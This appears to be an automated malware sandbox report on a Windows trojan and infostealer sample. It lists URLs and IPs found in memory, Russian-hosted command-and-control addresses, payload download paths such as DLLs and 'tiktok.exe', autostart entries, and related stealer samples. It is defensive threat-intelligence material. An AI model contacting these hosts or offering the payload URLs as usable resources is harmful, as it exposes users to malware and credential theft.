                                                                                        • Avira URL Cloud: safe
                                                                                        unknown
                                                                                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=u5ek.0.exe, 00000001.00000003.1759189708.000000000439B000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2875147556.0000000003726000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2875147556.00000000032B9000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2875147556.0000000003323000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2875147556.0000000003784000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          http://185.172.128.203/tiktok.exe6=u5ek.0.exe, 00000001.00000002.2160907832.0000000004347000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          unknown
                                                                                          http://185.172.128.76/15f649199f40275b/freebl3.dllEu5ek.0.exe, 00000001.00000002.2160907832.0000000004347000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          unknown
                                                                                          https://rt.services.visualstudio.com/lSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2930988903.000002727CF20000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2903506370.00000272100C3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016u5ek.0.exe, 00000001.00000003.1752307991.00000000245BD000.00000004.00000020.00020000.00000000.sdmp, u5ek.0.exe, 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpfalse
                                                                                              high
                                                                                              http://gdlp01.c-wss.com/rmds/ic/universalinstaller/common/checkconnectionrun.exe, run.exe, 00000002.00000000.1783099524.000000000031C000.00000002.00000001.01000000.00000009.sdmp, run.exe, 00000002.00000002.1863586625.000000000031C000.00000002.00000001.01000000.00000009.sdmp, run.exe, 00000014.00000002.2259125869.000000000031C000.00000002.00000001.01000000.00000009.sdmpfalse
                                                                                                high
                                                                                                https://dc.services.visualstudio.com/SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2871903084.0000027200266000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://www.ecosia.org/newtab/u5ek.0.exe, 00000001.00000003.1759189708.000000000439B000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2875147556.0000000003328000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2875147556.0000000003726000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2875147556.00000000032B9000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2875147556.0000000003784000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    http://www.symauth.com/cps0(run.exe, 00000002.00000002.1865849409.0000000002681000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2163360816.00000000057C5000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000014.00000002.2262937646.0000000003DD3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-bru5ek.0.exe, 00000001.00000003.1883816519.000000002A908000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        http://dejavu.sourceforge.nethttp://dejavu.sourceforge.netFontsSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2924565722.000002727CB30000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2903506370.00000272100C3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        unknown
                                                                                                        https://iolo.comH42652B74-0AD8-4B60-B8FD-69ED38F7666BSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2871903084.0000027200001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        • URL Reputation: safe
                                                                                                        unknown
                                                                                                        http://185.172.128.76/15f649199f40275b/mozglue.dllou5ek.0.exe, 00000001.00000002.2160907832.0000000004347000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        unknown
                                                                                                        https://dc.services.visualstudio.com/fSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2930988903.000002727CF20000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2903506370.00000272100C3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://profiler.monitor.azure.com/SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2871903084.0000027200266000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            http://www.symauth.com/rpa00run.exe, 00000002.00000002.1865849409.0000000002681000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2163360816.00000000057C5000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000014.00000002.2262937646.0000000003DD3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              http://185.172.128.76/3cd2b41cbde8fc9c.php(;Tu5ek.0.exe, 00000001.00000003.1778198760.000000000439F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              unknown
                                                                                                              https://www.newtonsoft.com/jsonschemaSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2903506370.00000272100C3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                http://www.info-zip.org/run.exe, 00000002.00000002.1865849409.000000000262B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2163360816.000000000577C000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000014.00000002.2262937646.0000000003D7D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://download.iolo.net/sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.0.57/SystemMechanic.exe.6-u5ek.3.exe, 00000006.00000003.2249141509.0000000002624000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  unknown
                                                                                                                  https://westus2-2.in.applicationinsights.azure.com/SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2871903084.0000027200266000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://www.iolo.com/company/legal/eula/?SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2931938048.000002727D080000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      http://185.172.128.76u5ek.0.exe, 00000001.00000002.2160863373.00000000042D4000.00000040.00000020.00020000.00000000.sdmptrue
                                                                                                                      • Avira URL Cloud: safe
                                                                                                                      unknown
                                                                                                                      http://dejavu.sourceforge.net/wiki/index.php/LicenseSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2924565722.000002727CB30000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2903506370.00000272100C3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        http://185.172.128.76/3cd2b41cbde8fc9c.phpad32c124f7c2674f26e5e63942ecbrelease05bfdde8fa3fa3eef0df8cu5ek.0.exe, 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpfalse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        unknown
                                                                                                                        https://scripts.sil.org/OFLThisSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2931938048.000002727D080000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDFu5ek.0.exe, 00000001.00000003.1883816519.000000002A908000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            https://github.com/itfoundry/Poppins)&&&&zSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2931938048.000002727D080000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              https://github.com/itfoundry/Poppins)SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2931938048.000002727D080000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                https://snapshot.monitor.azure.com/SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2871903084.0000027200266000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://github.com/itfoundry/Poppins)&&&&vSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2931938048.000002727D080000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    http://ocsp.sectigo.com0wxfSIz4PAi.exe, 00000000.00000003.1819490382.00000000075F9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    unknown
                                                                                                                                    https://www.iolo.com/company/legal/eula/SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2871903084.0000027200001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      https://www.newtonsoft.com/jsonSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2927691162.000002727CDC0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2903506370.00000272100C3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://westus2-2.in.applicationinsights.azure.com/v2/trackSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2871903084.0000027200266000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=u5ek.0.exe, 00000001.00000003.1759189708.000000000439B000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2875147556.0000000003328000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2875147556.0000000003726000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2875147556.00000000032B9000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2875147556.0000000003784000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            http://185.172.128.76/15f649199f40275b/softokn3.dllYu5ek.0.exe, 00000001.00000002.2160907832.0000000004347000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                            unknown
                                                                                                                                            https://duckduckgo.com/chrome_newtabSMSBuild.exe, 0000000D.00000002.2875147556.0000000003323000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2875147556.0000000003784000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17u5ek.0.exe, 00000001.00000003.1752307991.00000000245BD000.00000004.00000020.00020000.00000000.sdmp, u5ek.0.exe, 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpfalse
                                                                                                                                                high
                                                                                                                                                http://google.comwxfSIz4PAi.exe, 00000000.00000003.1819490382.000000000720D000.00000004.00000020.00020000.00000000.sdmp, u5ek.3.exe, 00000006.00000000.1817573323.000000000041C000.00000020.00000001.01000000.0000000C.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  https://dc.services.visualstudio.com/v2/trackSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2871903084.0000027200266000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    http://185.172.128.203/tiktok.exe00u5ek.0.exe, 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpfalse
                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                    unknown
                                                                                                                                                    http://www.codeplex.com/prismSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2929436682.000002727CE70000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2871903084.0000027200001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      https://taskscheduler.codeplex.com/SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        https://westus2-2.in.applicationinsights.azure.com/;LiveEndpoint=https://westus2.livediagnostics.monSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2871903084.0000027200001000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2871903084.0000027200266000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          http://compositewpf.codeplex.com/SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2929436682.000002727CE70000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchu5ek.0.exe, 00000001.00000003.1759189708.000000000439B000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2875147556.0000000003328000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2875147556.0000000003726000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2875147556.00000000032B9000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2875147556.0000000003784000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              https://sectigo.com/CPS0DwxfSIz4PAi.exe, 00000000.00000003.1819490382.00000000075F9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              • URL Reputation: safe
                                                                                                                                                              unknown
                                                                                                                                                              https://dc.services.visualstudio.com/Jhttps://rt.services.visualstudio.com/Fhttps://profiler.monitorSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2930988903.000002727CF20000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2903506370.00000272100C3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17chost.exeu5ek.0.exe, 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  http://185.172.128.76/3cd2b41cbde8fc9c.phpOu5ek.0.exe, 00000001.00000002.2160907832.00000000042EA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                  unknown
                                                                                                                                                                  http://dejavu.sourceforge.net/wiki/index.php/Licensehttp://dejavu.sourceforge.net/wiki/index.php/LicSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2924565722.000002727CB30000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2903506370.00000272100C3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://rt.services.visualstudio.com/SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2871903084.0000027200266000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016.exeu5ek.0.exe, 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        http://www.sqlite.org/copyright.html.u5ek.0.exe, 00000001.00000002.2173534479.000000001E637000.00000004.00000020.00020000.00000000.sdmp, u5ek.0.exe, 00000001.00000002.2206231639.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                          high
                                                                                                                                                                          https://github.com/JamesNK/Newtonsoft.JsonSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2927691162.000002727CDC0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2903506370.00000272100C3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://www.google.com/images/branding/product/ico/googleg_lodp.icou5ek.0.exe, 00000001.00000003.1759189708.000000000439B000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2875147556.0000000003726000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2875147556.00000000032B9000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2875147556.0000000003323000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2875147556.0000000003784000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://github.com/microsoft/ApplicationInsights-dotnet/issues/2560SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2903506370.00000272100C3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                high
                                                                                                                                                                                http://www.vmware.com/0/run.exe, 00000002.00000002.1865849409.0000000002681000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2163360816.00000000057C5000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000014.00000002.2262937646.0000000003DD3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://pastebin.com/raw/z9pYkqPQMSBuild.exe, 0000000D.00000002.2875147556.0000000003201000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    • No. of IPs < 25%
                                                                                                                                                                                    • 25% < No. of IPs < 50%
                                                                                                                                                                                    • 50% < No. of IPs < 75%
                                                                                                                                                                                    • 75% < No. of IPs
                                                                                                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                    185.172.128.90
                                                                                                                                                                                    unknownRussian Federation
                                                                                                                                                                                    50916NADYMSS-ASRUtrue
                                                                                                                                                                                    185.172.128.228
                                                                                                                                                                                    unknownRussian Federation
                                                                                                                                                                                    50916NADYMSS-ASRUfalse
                                                                                                                                                                                    185.172.128.203
                                                                                                                                                                                    unknownRussian Federation
                                                                                                                                                                                    50916NADYMSS-ASRUfalse
                                                                                                                                                                                    20.157.87.45
                                                                                                                                                                                    svc.iolo.comUnited States
                                                                                                                                                                                    8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                    91.215.85.66
                                                                                                                                                                                    unknownRussian Federation
                                                                                                                                                                                    34665PINDC-ASRUtrue
                                                                                                                                                                                    185.172.128.76
                                                                                                                                                                                    unknownRussian Federation
                                                                                                                                                                                    50916NADYMSS-ASRUtrue
                                                                                                                                                                                    176.97.76.106
                                                                                                                                                                                    note.padd.cn.comUnited Kingdom
                                                                                                                                                                                    43658INTRAFFIC-ASUAfalse
                                                                                                                                                                                    185.172.128.59
                                                                                                                                                                                    unknownRussian Federation
                                                                                                                                                                                    50916NADYMSS-ASRUfalse
                                                                                                                                                                                    Joe Sandbox version:40.0.0 Tourmaline
                                                                                                                                                                                    Analysis ID:1432361
                                                                                                                                                                                    Start date and time:2024-04-26 23:08:06 +02:00
                                                                                                                                                                                    Joe Sandbox product:CloudBasic
                                                                                                                                                                                    Overall analysis duration:0h 12m 43s
                                                                                                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                                                                                                    Report type:full
                                                                                                                                                                                    Cookbook file name:default.jbs
                                                                                                                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                    Number of analysed new started processes analysed:26
                                                                                                                                                                                    Number of new started drivers analysed:0
                                                                                                                                                                                    Number of existing processes analysed:0
                                                                                                                                                                                    Number of existing drivers analysed:0
                                                                                                                                                                                    Number of injected processes analysed:0
                                                                                                                                                                                    Technologies:
                                                                                                                                                                                    • HCA enabled
                                                                                                                                                                                    • EGA enabled
                                                                                                                                                                                    • AMSI enabled
                                                                                                                                                                                    Analysis Mode:default
                                                                                                                                                                                    Analysis stop reason:Timeout
                                                                                                                                                                                    Sample name:wxfSIz4PAi.exe
                                                                                                                                                                                    renamed because original name is a hash value
                                                                                                                                                                                    Original Sample Name:0a7871874dc7111b978e798f616211f9.exe
                                                                                                                                                                                    Detection:MAL
                                                                                                                                                                                    Classification:mal100.troj.spyw.expl.evad.winEXE@27/63@5/8
                                                                                                                                                                                    EGA Information:
                                                                                                                                                                                    • Successful, ratio: 100%
                                                                                                                                                                                    HCA Information:
                                                                                                                                                                                    • Successful, ratio: 85%
                                                                                                                                                                                    • Number of executed functions: 112
                                                                                                                                                                                    • Number of non-executed functions: 252
                                                                                                                                                                                    Cookbook Comments:
                                                                                                                                                                                    • Found application associated with file extension: .exe
                                                                                                                                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                                                                                    • Excluded IPs from analysis (whitelisted): 40.68.123.157, 72.21.81.240, 192.229.211.108, 40.126.28.21, 40.126.28.19, 40.126.28.11, 40.126.7.35, 40.126.28.13, 40.126.28.14, 40.126.28.18, 40.126.28.22, 13.85.23.206, 20.166.126.56, 20.189.173.22, 23.202.106.101, 20.9.155.145
                                                                                                                                                                                    • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, onedsblobprdwus17.westus.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, wu.azureedge.net, gig-ai-prod-westus2-0.trafficmanager.net, ocsp.digicert.com, login.live.com, e16604.g.akamaiedge.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, hlb.apr-52dd2-0.edgecastdns.net, prod.fs.microsoft.com.akadns.net, glb.sls.prod.dcat.dsp.trafficmanager.net, prdv4a.aadg.msidentity.com, fs.microsoft.com, wu.ec.azureedge.net, www.tm.v4.a.prd.aadg.akadns.net, ctldl.windowsupdate.com, wu-bg-shim.trafficmanager.net, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, blobcollector.events.data.trafficmanager.net, gig-ai-prod-wus2-0-app-v4-tag.westus2.cloudapp.azure.com, umwatson.events.data.microsoft.com, www.tm.lg.prod.aadmsa.trafficmanager.net
                                                                                                                                                                                    • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                    • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                    • Report size exceeded maximum capacity and may have missing network information.
                                                                                                                                                                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                    • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                    • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                    • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                                                                    • VT rate limit hit for: wxfSIz4PAi.exe
                                                                                                                                                                                    TimeTypeDescription
                                                                                                                                                                                    22:09:27AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BIT5E5.tmp
                                                                                                                                                                                    22:09:40AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\il_Plugin_v1.lnk
                                                                                                                                                                                    23:09:28API Interceptor2x Sleep call for process: WerFault.exe modified
                                                                                                                                                                                    23:09:47API Interceptor2888x Sleep call for process: MSBuild.exe modified
                                                                                                                                                                                    23:10:00API Interceptor7709x Sleep call for process: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe modified
                                                                                                                                                                                    23:10:23API Interceptor114x Sleep call for process: EGIJKEHCAK.exe modified
                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                    185.172.128.90file.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                    • 185.172.128.90/cpa/ping.php?substr=one&s=ab&sub=2838
                                                                                                                                                                                    JHqNlw9U8c.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                    • 185.172.128.90/cpa/ping.php?substr=one&s=ab&sub=0
                                                                                                                                                                                    file.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                    • 185.172.128.90/cpa/ping.php?substr=one&s=ab&sub=28381000
                                                                                                                                                                                    QPoX60yhZt.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                    • 185.172.128.90/cpa/ping.php?substr=one&s=ab&sub=0
                                                                                                                                                                                    R0hb7jyBcv.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                    • 185.172.128.90/cpa/ping.php?substr=five&s=ab&sub=0
                                                                                                                                                                                    g77dRQ1Csm.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                    • 185.172.128.90/cpa/ping.php?substr=five&s=ab&sub=0
                                                                                                                                                                                    QEO2mJ8xHx.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                                                                                                                                                    • 185.172.128.90/cpa/ping.php?substr=seven&s=ab&sub=0
                                                                                                                                                                                    j36lCJ7IcT.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRATBrowse
